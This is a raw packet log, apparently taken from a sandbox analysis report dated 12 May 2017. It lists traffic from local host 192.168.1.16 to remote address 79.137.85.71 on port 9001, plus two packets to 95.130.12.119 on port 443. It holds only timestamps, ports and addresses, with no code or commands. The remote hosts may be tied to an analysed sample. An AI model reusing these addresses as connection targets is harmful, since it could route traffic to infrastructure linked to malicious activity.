May 12, 2017 18:55:31.946490049 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946502924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.946577072 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.946592093 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948558092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948575974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948636055 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.948652029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948868990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948888063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.948932886 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.948945999 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.953252077 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.953274965 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.953346968 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.953361988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.962601900 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.962614059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.962734938 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.962752104 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.964968920 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.964987993 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.965065002 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.965080023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.971843004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.971863031 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:31.971961021 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:31.971976042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.034569979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.034673929 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.034694910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.072571039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.072593927 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.072678089 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.072698116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074438095 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074465036 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074564934 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.074579954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074635983 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074654102 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074702978 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.074717045 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074791908 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074803114 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.074856043 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.074870110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075110912 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075130939 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075180054 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.075192928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075301886 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075320959 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075371981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.075383902 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075423002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075438976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.075544119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.075558901 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.077176094 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.077208996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.077280998 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.077295065 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078892946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078910112 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078953981 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.078983068 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.078995943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079015017 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079070091 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.079086065 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079416037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079427004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079479933 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079480886 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.079489946 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079497099 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079507113 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079562902 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.079777002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079889059 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079896927 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.079943895 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.080075979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.080084085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.080089092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.080137014 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082320929 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082331896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082339048 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082392931 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082431078 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082458973 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082531929 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082541943 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082549095 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082591057 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082611084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082690954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.082742929 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.082771063 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.083931923 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.083950996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.083998919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084001064 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084008932 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084019899 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084028959 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084080935 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084214926 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084225893 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084244967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084275007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084336042 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084352016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084491014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.084532976 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.084547997 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086240053 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086251974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086303949 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086313009 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.086313963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086323023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086334944 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086383104 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086389065 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.086390972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086405039 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086436033 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.086489916 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.086504936 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.087899923 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.087986946 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.088001966 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.088129044 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.088140011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.088207960 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.088221073 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.092992067 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.093019009 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.093081951 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.093096972 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.103948116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104024887 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.104039907 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104626894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104655027 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104737043 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.104753971 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104810953 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104837894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104890108 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.104906082 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.104979992 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105003119 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105055094 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105070114 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105171919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105189085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105243921 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105259895 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105540037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105551958 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105557919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105607033 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105633974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105676889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105690002 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105762005 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105777979 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105823040 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105834961 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.105895996 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.105911016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106281042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106292963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106360912 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.106388092 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106499910 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106513023 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.106571913 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.106587887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108685970 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108700037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108752966 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.108764887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108783007 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108793020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108807087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.108836889 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.113401890 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.113415003 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.113485098 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.113500118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115741014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115772963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115797043 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115808010 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115910053 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115921974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.115931034 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116017103 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116384029 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.116415024 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116422892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116450071 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116460085 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116471052 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116549015 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116569996 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.116635084 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.116653919 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.117902994 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.117952108 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118012905 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.118029118 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118170977 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118199110 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.118257046 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.118273020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.148878098 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.148916006 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.149029970 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.149069071 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.181623936 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.181660891 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.182742119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.182760000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.183706045 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.183732986 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.191498041 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.229846954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.230012894 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.230030060 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232661963 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232690096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232702017 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.232858896 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.232877016 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.236982107 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.237001896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.237010956 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.237093925 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.237113953 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238353014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238369942 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238379955 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238392115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.238476992 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.238492012 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239670038 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239695072 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239703894 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.239801884 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.239821911 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242374897 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242389917 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242480993 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.242494106 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242506027 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242516041 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.242543936 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.243746042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.243763924 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.243822098 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.243841887 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.244927883 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.244942904 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.245044947 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.245064020 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253758907 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253791094 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253808975 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.253983021 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.254005909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254607916 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254635096 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254642010 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.254647017 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255037069 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.255059004 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255076885 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255090952 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.255256891 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.255278111 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.256661892 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.256675005 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.256772995 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.256797075 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260359049 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260373116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260385990 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.260529995 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.260550022 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.267451048 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.267467976 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.267579079 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.267602921 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272125959 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272248983 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.272269964 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272938013 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.272964954 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273016930 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.273040056 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273081064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273092985 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273129940 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.273139000 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273149014 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273154974 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273164988 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.273190975 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.273389101 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.274168968 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.274180889 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.274188042 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.274322033 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.274780989 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.275248051 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.275258064 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.275366068 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.275381088 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.276026011 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.276036024 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.276082039 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.276098967 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.281147957 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.281160116 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.281232119 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.281249046 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.360289097 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.360315084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.360356092 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:32.360374928 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.584441900 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:32.584563971 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.085835934 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.093858957 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.093883038 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.094348907 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.132462025 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.132625103 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.132646084 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.176326036 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.176354885 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.176687002 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.176701069 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.176906109 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.176918983 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.196837902 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.196868896 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.197190046 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.197204113 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.197444916 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.197458029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.197793007 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.197805882 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.252823114 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.252852917 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.253237963 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.253252029 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.253762960 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.253787041 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.253993034 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.254005909 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.254430056 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.254443884 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.255429029 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.255444050 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.255637884 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.292448044 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.292566061 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:34.332453012 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:34.544411898 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:55:34.821093082 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:55:35.093167067 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:35.093194962 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:35.421363115 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:35.429775953 CEST491989001192.168.1.1679.137.85.71
May 12, 2017 18:55:35.429804087 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:35.759613037 CEST90014919879.137.85.71192.168.1.16
May 12, 2017 18:55:35.765469074 CEST491989001192.168.1.1679.137.85.71
